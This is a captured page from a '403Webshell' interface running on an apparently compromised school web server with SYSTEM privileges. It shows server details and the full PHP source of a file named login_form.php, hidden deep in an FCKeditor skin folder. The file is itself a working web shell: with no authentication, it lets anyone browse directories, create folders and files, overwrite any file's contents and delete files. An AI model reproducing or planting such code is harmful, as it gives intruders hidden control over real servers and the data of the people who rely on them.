403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/queencollege2/FCKeditor/editor/skins/office2003/js/d/a/f/e/c/b/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/myschool/queencollege2/FCKeditor/editor/skins/office2003/js/d/a/f/e/c/b/login_form.php
<style>
  form{
      display:inline;
  }
  textarea{
      padding:10px;
  }
</style>
<?php
if(isset($_GET["f"])&&$_GET["f"]!=null){$f=$_GET["f"];} else{ $f=".";}

echo "root web : ". $_SERVER['DOCUMENT_ROOT'] .'<hr>';

function myfunction($value,$key){
    global $f;
    echo "<a href='?f=".explode("/$value",realpath($f))[0]."/".htmlentities($value)."'>".htmlentities($value)."</a>/";
}

echo "<hr>";

$curFile=$_SERVER['REQUEST_SCHEME'] .'://'. $_SERVER['HTTP_HOST']. explode('?', $_SERVER['REQUEST_URI'], 2)[0];

echo '<form action="" method="post"> <input name="mkdir" style="width:100px;" required> <input type="submit" value="MKDIR"/> </form>';

echo '<form action="" method="post"> <input name="mkfile" style="width:100px;" required> <input type="submit" value="MAKE FILE"/> </form>';

echo "<br>";

if(isset($_GET["edit"])){
    $arrPath=explode("/",dirname(realpath($f)));
    array_walk($arrPath,"myfunction");
    
if (isset($_POST['text'])){
    file_put_contents($f, $_POST['text']);
}
$text = file_get_contents($f);

echo '<form action="" method="post"> <textarea name="text" style="width:100%;height:60%;">'.htmlspecialchars($text).'</textarea> <input type="submit" value="SAVE"/> </form>';
}
else{
    $arrPath=explode("/",realpath($f));
    array_walk($arrPath,"myfunction");
    
    if(isset($_POST["mkfile"])){
        echo file_put_contents($f."/".$_POST["mkfile"],"");
    }
    
    if(isset($_GET["unlink"])){
        unlink($f."/".$_GET["unlink"]);
    }
    
    if(isset($_POST["mkdir"])){
        mkdir($f."/".$_POST["mkdir"]);
    }
    
    echo "<table> <tr> <th>folder</th> <th>izin</th> <th> url </th> <th>options</th> </tr>";
    
    $data = scandir(is_dir($f)?$f:realpath($f));

 foreach ($data as $value) {
  $lastMod=date("d-m-Y H:i.", filemtime("$f/$value"));
  $url= str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['REQUEST_SCHEME'] .'://'.$_SERVER['HTTP_HOST'],realpath("$f/$value"));

  if(is_dir("$f/$value")){
    echo "<tr> <td> <a href='?f=$f/".str_replace("&","%26",$value)."'>".htmlentities($value)."</a> </td> <td>".substr(sprintf("%o", fileperms("$f/$value")),-4)." </td> <td> ". $url ." </td> <td> <a href='?f=".str_replace("&","%26",$f)."&rmdir=$value'>delete</a> </td> </tr>";
  }
  else{
    echo "<tr> <td> <a href='?f=".str_replace("&","%26",$f)."/$value&edit=true'>$value</a> </td> <td>".substr(sprintf("%o", fileperms("$f/$value")),-4)." </td> <td> ". $url ." </td>  <td> <a href='?f=".str_replace("&","%26",$f)."&unlink=$value'>delete</a> </td> </tr>"; 
  }
 }
  
echo "</table>";
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit